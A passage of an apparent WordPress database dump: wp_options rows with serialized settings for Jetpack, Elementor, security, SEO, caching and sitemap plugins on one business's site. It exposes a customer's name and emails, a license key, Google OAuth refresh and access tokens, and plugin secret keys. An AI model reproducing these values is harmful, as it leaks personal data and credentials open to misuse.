signup\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"4f84d218792a6efa06ed6feae09c4dd5\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"ca086af79d0d9dccacc934ccff5b4fd7\";a:14:{s:4:\"name\";s:15:\"Tiled Galleries\";s:11:\"description\";s:61:\"Display image galleries in a variety of elegant arrangements.\";s:4:\"sort\";s:2:\"24\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:43:\"gallery, tiles, tiled, grid, mosaic, images\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"43c24feb7c541c376af93e0251c1a261\";a:14:{s:4:\"name\";s:20:\"Backups and Scanning\";s:11:\"description\";s:100:\"Protect your site with daily or real-time backups and automated virus scanning and threat detection.\";s:4:\"sort\";s:2:\"32\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:5:\"0:1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:5:\"false\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:16:\"Security, Health\";s:25:\"additional_search_queries\";s:386:\"backup, cloud backup, database backup, restore, wordpress backup, backup plugin, wordpress backup plugin, back up, backup wordpress, backwpup, vaultpress, backups, off-site backups, offsite backup, offsite, off-site, antivirus, malware scanner, security, virus, viruses, prevent viruses, scan, anti-virus, antimalware, protection, safe browsing, malware, wp security, wordpress security\";s:12:\"plan_classes\";s:27:\"personal, business, premium\";}s:32:\"b9396d8038fc29140b499098d2294d79\";a:14:{s:4:\"name\";s:17:\"Site verification\";s:11:\"description\";s:58:\"Establish your site\'s authenticity with external services.\";s:4:\"sort\";s:2:\"33\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:56:\"webmaster, seo, google, bing, pinterest, search, console\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"afe184082e106c1bdfe1ee844f98aef3\";a:14:{s:4:\"name\";s:10:\"VideoPress\";s:11:\"description\";s:101:\"Save on hosting storage and bandwidth costs by streaming fast, ad-free video from our global network.\";s:4:\"sort\";s:2:\"27\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:118:\"video, videos, videopress, video gallery, video player, videoplayer, mobile video, vimeo, youtube, html5 video, stream\";s:12:\"plan_classes\";s:17:\"business, premium\";}s:32:\"44637d43460370af9a1b31ce3ccec0cd\";a:14:{s:4:\"name\";s:17:\"Widget Visibility\";s:11:\"description\";s:42:\"Control where widgets appear on your site.\";s:4:\"sort\";s:2:\"17\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:54:\"widget visibility, logic, conditional, widgets, widget\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"694c105a5c3b659acfcddad220048d08\";a:14:{s:4:\"name\";s:21:\"Extra Sidebar Widgets\";s:11:\"description\";s:49:\"Provides additional widgets for use on your site.\";s:4:\"sort\";s:1:\"4\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:65:\"widget, widgets, facebook, gallery, twitter, gravatar, image, rss\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"ae15da72c5802d72f320640bad669561\";a:14:{s:4:\"name\";s:3:\"Ads\";s:11:\"description\";s:60:\"Earn income by allowing Jetpack to display high quality ads.\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:5:\"4.5.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:19:\"Traffic, Appearance\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:26:\"advertising, ad codes, ads\";s:12:\"plan_classes\";s:17:\"premium, business\";}}','no'),(50938,'edd_onepress_plus_license_data','O:8:\"stdClass\":15:{s:7:\"success\";b:1;s:7:\"license\";s:5:\"valid\";s:7:\"item_id\";b:0;s:9:\"item_name\";s:0:\"\";s:10:\"license_id\";i:37940;s:11:\"download_id\";i:8537;s:13:\"license_limit\";i:1;s:10:\"site_count\";i:1;s:7:\"expires\";s:19:\"2019-12-11 23:59:59\";s:16:\"activations_left\";i:0;s:8:\"checksum\";s:32:\"87b7bd46d6137d84db64287b7616bf82\";s:10:\"payment_id\";i:49545;s:13:\"customer_name\";s:22:\"Nor Faiz Muhammad Noor\";s:14:\"customer_email\";s:16:\"faiz@bintara.net\";s:8:\"price_id\";s:1:\"1\";}','yes'),(156,'edd_onepress_plus_license_key','82b6483b62fe559be25b33a96b138938','yes'),(159,'wpforms_version','1.5.6','yes'),(160,'wpforms_activated','a:1:{s:4:\"lite\";i:1544491077;}','yes'),(161,'widget_wpforms-widget','a:2:{i:3;a:4:{s:5:\"title\";s:10:\"Contact Us\";s:7:\"form_id\";i:1251;s:10:\"show_title\";b:0;s:9:\"show_desc\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(162,'_amn_wpforms-lite_last_checked','1555286400','yes'),(163,'classic-editor-replace','classic','yes'),(164,'classic-editor-allow-users','allow','yes'),(165,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(167,'wpforms_review','a:2:{s:4:\"time\";i:1545735159;s:9:\"dismissed\";b:1;}','yes'),(169,'_transient__demo_contents_file_onepress-plus','a:2:{s:3:\"xml\";i:14;s:4:\"json\";i:15;}','yes'),(3802,'_elementor_installed_time','1545210795','yes'),(3801,'elementor_version','2.7.4','yes'),(56242,'elementor_icon_manager_needs_update','yes','yes'),(56243,'elementor_load_fa4_shim','yes','yes'),(4968,'elementor_allow_tracking','no','yes'),(4969,'elementor_tracker_notice','1','yes'),(3804,'elementor_remote_info_feed_data','a:5:{i:0;a:5:{s:5:\"title\";s:77:\"Monday Masterclass: How to Build an Online Store With WooCommerce & Elementor\";s:7:\"excerpt\";s:185:\"We are happy to be back with our Monday Masterclasses after a short break. This week we will take you through the exciting process of building a WordPress online store with WooCommerce.\";s:7:\"created\";s:10:\"1572856019\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:155:\"https://elementor.com/blog/how-to-build-an-online-store-with-woocommerce-elementor/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:38:\"Podcast #52: Growing Your Online Sales\";s:7:\"excerpt\";s:206:\"Greg Karelitz, global manager of HubSpot for Startups, explains why and when you need to use CRM, describes the first steps of email automation, and shares tips on planning your sales journey the right way.\";s:7:\"created\";s:10:\"1572512063\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:124:\"https://elementor.com/blog/podcast-52-greg-karelitz/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:38:\"Hilarious Stories of Nightmare Clients\";s:7:\"excerpt\";s:148:\"This Halloween, we asked our community to share their most gruesome clients. These stories cracked us up, and we hope they will do the same for you!\";s:7:\"created\";s:10:\"1572353741\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:117:\"https://elementor.com/blog/nightmare-clients/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:3;a:5:{s:5:\"title\";s:34:\"WordCamp US 2019 â€” Here We Come!\";s:7:\"excerpt\";s:84:\"Elementor is coming to WordCamp US â€” St. Louis, and we hope to see you guys there.\";s:7:\"created\";s:10:\"1572346501\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:116:\"https://elementor.com/blog/wordcamp-us-2019/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:4;a:5:{s:5:\"title\";s:71:\"How to Use Dynamic User Profile Pictures & Dynamic Numbers in Elementor\";s:7:\"excerpt\";s:197:\"In this tutorial, we\'re going to show you how you can use Elementor\'s dynamic content integrations to create personalized project overview pages for your clients, complete with a custom login page.\";s:7:\"created\";s:10:\"1571979674\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:107:\"https://elementor.com/blog/?p=31825&utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','no'),(3811,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(3812,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(3813,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(61392,'updraft_combine_jobs_around','1573815735','yes'),(48262,'aiowpsec_db_version','1.9','yes'),(48263,'aio_wp_security_configs','a:91:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:19:\"faiz@bintara.com.my\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"9crh1va49t6lry781o4u\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"3qv9059z48d52z9scn21\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:19:\"faiz@bintara.com.my\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:19:\"faiz@bintara.com.my\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(1217,'wordfence_installed','1','yes'),(1218,'wordfenceActivated','1','yes'),(1219,'wf_plugin_act_error','','yes'),(1233,'aioseop_options','a:85:{s:16:\"aiosp_home_title\";N;s:22:\"aiosp_home_description\";s:0:\"\";s:20:\"aiosp_togglekeywords\";i:1;s:19:\"aiosp_home_keywords\";N;s:26:\"aiosp_use_static_home_info\";i:0;s:9:\"aiosp_can\";i:1;s:30:\"aiosp_no_paged_canonical_links\";i:0;s:31:\"aiosp_customize_canonical_links\";i:0;s:20:\"aiosp_rewrite_titles\";i:1;s:20:\"aiosp_force_rewrites\";i:1;s:24:\"aiosp_use_original_title\";i:0;s:28:\"aiosp_home_page_title_format\";s:12:\"%page_title%\";s:23:\"aiosp_page_title_format\";s:27:\"%page_title% | %blog_title%\";s:23:\"aiosp_post_title_format\";s:27:\"%post_title% | %blog_title%\";s:27:\"aiosp_category_title_format\";s:31:\"%category_title% | %blog_title%\";s:26:\"aiosp_archive_title_format\";s:30:\"%archive_title% | %blog_title%\";s:23:\"aiosp_date_title_format\";s:21:\"%date% | %blog_title%\";s:25:\"aiosp_author_title_format\";s:23:\"%author% | %blog_title%\";s:22:\"aiosp_tag_title_format\";s:20:\"%tag% | %blog_title%\";s:25:\"aiosp_search_title_format\";s:23:\"%search% | %blog_title%\";s:24:\"aiosp_description_format\";s:13:\"%description%\";s:22:\"aiosp_404_title_format\";s:33:\"Nothing found for %request_words%\";s:18:\"aiosp_paged_format\";s:14:\" - Part %page%\";s:17:\"aiosp_cpostactive\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:18:\"aiosp_cpostnoindex\";a:0:{}s:19:\"aiosp_cpostnofollow\";a:0:{}s:21:\"aiosp_posttypecolumns\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:19:\"aiosp_google_verify\";s:0:\"\";s:17:\"aiosp_bing_verify\";s:0:\"\";s:22:\"aiosp_pinterest_verify\";s:0:\"\";s:22:\"aiosp_google_publisher\";s:0:\"\";s:28:\"aiosp_google_disable_profile\";i:0;s:29:\"aiosp_google_sitelinks_search\";N;s:26:\"aiosp_google_set_site_name\";N;s:30:\"aiosp_google_specify_site_name\";N;s:28:\"aiosp_google_author_advanced\";i:0;s:28:\"aiosp_google_author_location\";a:1:{i:0;s:3:\"all\";}s:29:\"aiosp_google_enable_publisher\";s:2:\"on\";s:30:\"aiosp_google_specify_publisher\";N;s:25:\"aiosp_google_analytics_id\";N;s:25:\"aiosp_ga_advanced_options\";s:2:\"on\";s:15:\"aiosp_ga_domain\";N;s:21:\"aiosp_ga_multi_domain\";i:0;s:21:\"aiosp_ga_addl_domains\";N;s:21:\"aiosp_ga_anonymize_ip\";N;s:28:\"aiosp_ga_display_advertising\";N;s:22:\"aiosp_ga_exclude_users\";N;s:29:\"aiosp_ga_track_outbound_links\";i:0;s:25:\"aiosp_ga_link_attribution\";i:0;s:27:\"aiosp_ga_enhanced_ecommerce\";i:0;s:20:\"aiosp_use_categories\";i:0;s:26:\"aiosp_use_tags_as_keywords\";i:1;s:32:\"aiosp_dynamic_postspage_keywords\";i:1;s:22:\"aiosp_category_noindex\";i:1;s:26:\"aiosp_archive_date_noindex\";i:1;s:28:\"aiosp_archive_author_noindex\";i:1;s:18:\"aiosp_tags_noindex\";i:0;s:20:\"aiosp_search_noindex\";i:0;s:17:\"aiosp_404_noindex\";i:0;s:17:\"aiosp_tax_noindex\";a:0:{}s:23:\"aiosp_paginated_noindex\";i:0;s:24:\"aiosp_paginated_nofollow\";i:0;s:27:\"aiosp_generate_descriptions\";i:0;s:18:\"aiosp_skip_excerpt\";i:0;s:20:\"aiosp_run_shortcodes\";i:0;s:33:\"aiosp_hide_paginated_descriptions\";i:0;s:32:\"aiosp_dont_truncate_descriptions\";i:0;s:19:\"aiosp_schema_markup\";s:1:\"1\";s:20:\"aiosp_unprotect_meta\";i:0;s:33:\"aiosp_redirect_attachement_parent\";i:0;s:14:\"aiosp_ex_pages\";s:0:\"\";s:20:\"aiosp_post_meta_tags\";s:0:\"\";s:20:\"aiosp_page_meta_tags\";s:0:\"\";s:21:\"aiosp_front_meta_tags\";s:0:\"\";s:20:\"aiosp_home_meta_tags\";s:0:\"\";s:12:\"aiosp_do_log\";N;s:19:\"last_active_version\";s:6:\"3.2.10\";s:32:\"aiosp_schema_search_results_page\";s:1:\"1\";s:33:\"aiosp_schema_social_profile_links\";s:0:\"\";s:28:\"aiosp_schema_site_represents\";s:12:\"organization\";s:30:\"aiosp_schema_organization_name\";s:0:\"\";s:30:\"aiosp_schema_organization_logo\";s:0:\"\";s:24:\"aiosp_schema_person_user\";s:1:\"1\";s:25:\"aiosp_schema_phone_number\";s:0:\"\";s:25:\"aiosp_schema_contact_type\";s:4:\"none\";}','yes'),(1236,'sm_rewrite_done','$Id: sitemap-loader.php 937300 2014-06-23 18:04:11Z arnee $','yes'),(1237,'sm_options','a:52:{s:18:\"sm_b_prio_provider\";s:41:\"GoogleSitemapGeneratorPrioByCountProvider\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_pingmsn\";b:1;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:1;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.59999999999999997779553950749686919152736663818359375;s:15:\"sm_pr_posts_min\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"sm_pr_pages\";d:0.59999999999999997779553950749686919152736663818359375;s:10:\"sm_pr_cats\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_arch\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_auth\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_tags\";d:0.299999999999999988897769753748434595763683319091796875;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";i:1544708982;s:16:\"sm_i_hide_survey\";b:1;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";s:20:\"7961d4fb0cc3502c2384\";s:13:\"sm_i_lastping\";i:1573020823;s:16:\"sm_i_supportfeed\";b:1;s:22:\"sm_i_supportfeed_cache\";i:1573571566;}','yes'),(7038,'wpseo-gsc','a:1:{s:7:\"profile\";s:22:\"http://bintara.com.my/\";}','yes'),(7037,'wpseo-gsc-access_token','a:5:{s:13:\"refresh_token\";s:45:\"1/wWCFG3XyZQ2_s0DdaUuOtibQgLnpvu8egfBAdJEIu-M\";s:12:\"access_token\";s:129:\"ya29.GluGBnd5k1ZATdKYAFLaXS3Kx49voCSKRjzlr7CXFdF1kQUSHfqxSg4beQdSUGxVEVW0inb6hlorBMfdUjzJIOzS0SdxM_R7QTu-6x3G9IECtqNzziD8N-rXu9zY\";s:7:\"expires\";i:1546514689;s:10:\"expires_in\";i:3600;s:7:\"created\";i:1546482289;}','yes'),(7036,'wpseo-gsc-refresh_token','1/wWCFG3XyZQ2_s0DdaUuOtibQgLnpvu8egfBAdJEIu-M','yes'),(60643,'_transient_timeout_swift_performance_threads','1573751960','no'),(60644,'_transient_swift_performance_threads','a:0:{}','no'),(61437,'_transient_timeout_swift_performance_prebuild_booster','1573751960','no'),(61438,'_transient_swift_performance_prebuild_booster','a:1:{s:32:\"6d2bfb3a2927a83152d0becbc68d2cdc\";s:450:\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAABBklEQVQoka3RP0rbARwF8M+LIYS0iC02dAg2qLNEaOeCF+hUxBP0EM49gFs7dBZBC71AT9CtCi4V20lCsBpKmkH4Ovjb3MS3PN7y/vB4ZATWXg3bVX5ikviMt1U2Eh+rvMMI08RBlW3xQdnHHO/xJfHt1+/zT63GeB0dLFfpK2N0quzhBMdht8oOBsoo0UUnd2H9KpuwAM+Wll6LN2EaLjERp4kJvmMrnOG/eIJWOMIwvEh8DRt/r68OA6srw0U8x6Rp2kIbvWbWDWbNmqcNtxJXVdqN7p79OR+3IfFSWRcXykjMih9hXvSVQeKf0i3GiYEyVxYTl0UvTDG+99LayrD3sH/vcAtzbVIFlksuEAAAAABJRU5ErkJggg==\";}','no'),(61408,'_transient_timeout_wpseo_site_information','1573824237','no'),(5096,'ossdl_off_cdn_url','https://bintara.com.my','yes'),(5106,'wpsupercache_count','0','yes'),(5097,'ossdl_off_blog_url','https://bintara.com.my','yes'),(5098,'ossdl_off_include_dirs','wp-content,wp-includes','yes'),(5099,'ossdl_off_exclude','.php','yes'),(5100,'ossdl_cname','','yes'),(5105,'wpsupercache_start','1545794358','yes'),(5112,'wpsupercache_gc_time','1545794802','yes'),(5108,'supercache_stats','a:3:{s:9:\"generated\";i:1545794398;s:10:\"supercache\";a:5:{s:7:\"expired\";i:0;s:6:\"cached\";i:0;s:5:\"fsize\";i:0;s:11:\"cached_list\";a:0:{}s:12:\"expired_list\";a:0:{}}s:7:\"wpcache\";a:5:{s:7:\"expired\";i:0;s:6:\"cached\";i:0;s:5:\"fsize\";i:0;s:11:\"cached_list\";a:0:{}s:12:\"expired_list\";a:0:{}}}','yes'),(5135,'do_activate','0','yes'),(5187,'jetpack_constants_sync_checksum','a:19:{s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:17:\"WP_POST_REVISIONS\";i:4261170317;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:634125391;s:7:\"ABSPATH\";i:1143555356;s:14:\"WP_CONTENT_DIR\";i:1573542201;s:9:\"FS_METHOD\";i:634125391;s:18:\"DISALLOW_FILE_EDIT\";i:4261170317;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:16:\"JETPACK__VERSION\";i:2112716780;s:12:\"IS_PRESSABLE\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;s:11:\"PHP_VERSION\";i:2480039692;s:15:\"WP_MEMORY_LIMIT\";i:464916964;s:19:\"WP_MAX_MEMORY_LIMIT\";i:1474498405;}','yes'),(5190,'jetpack_sync_https_history_main_network_site_url','a:1:{i:0;s:5:\"https\";}','yes'),(5191,'jetpack_sync_https_history_site_url','a:2:{i:0;s:5:\"https\";i:1;s:5:\"https\";}','yes'),(5192,'jetpack_sync_https_history_home_url','a:2:{i:0;s:5:\"https\";i:1;s:5:\"https\";}','yes'),(1259,'sm_status','O:28:\"GoogleSitemapGeneratorStatus\":4:{s:39:\"\0GoogleSitemapGeneratorStatus\0startTime\";d:1573020819.671749114990234375;s:37:\"\0GoogleSitemapGeneratorStatus\0endTime\";d:1573020821.2368309497833251953125;s:41:\"\0GoogleSitemapGeneratorStatus\0pingResults\";a:2:{s:6:\"google\";a:5:{s:9:\"startTime\";d:1573020819.6780910491943359375;s:7:\"endTime\";d:1573020819.9452331066131591796875;s:7:\"success\";b:1;s:3:\"url\";s:97:\"http://www.google.com/webmasters/sitemaps/ping?sitema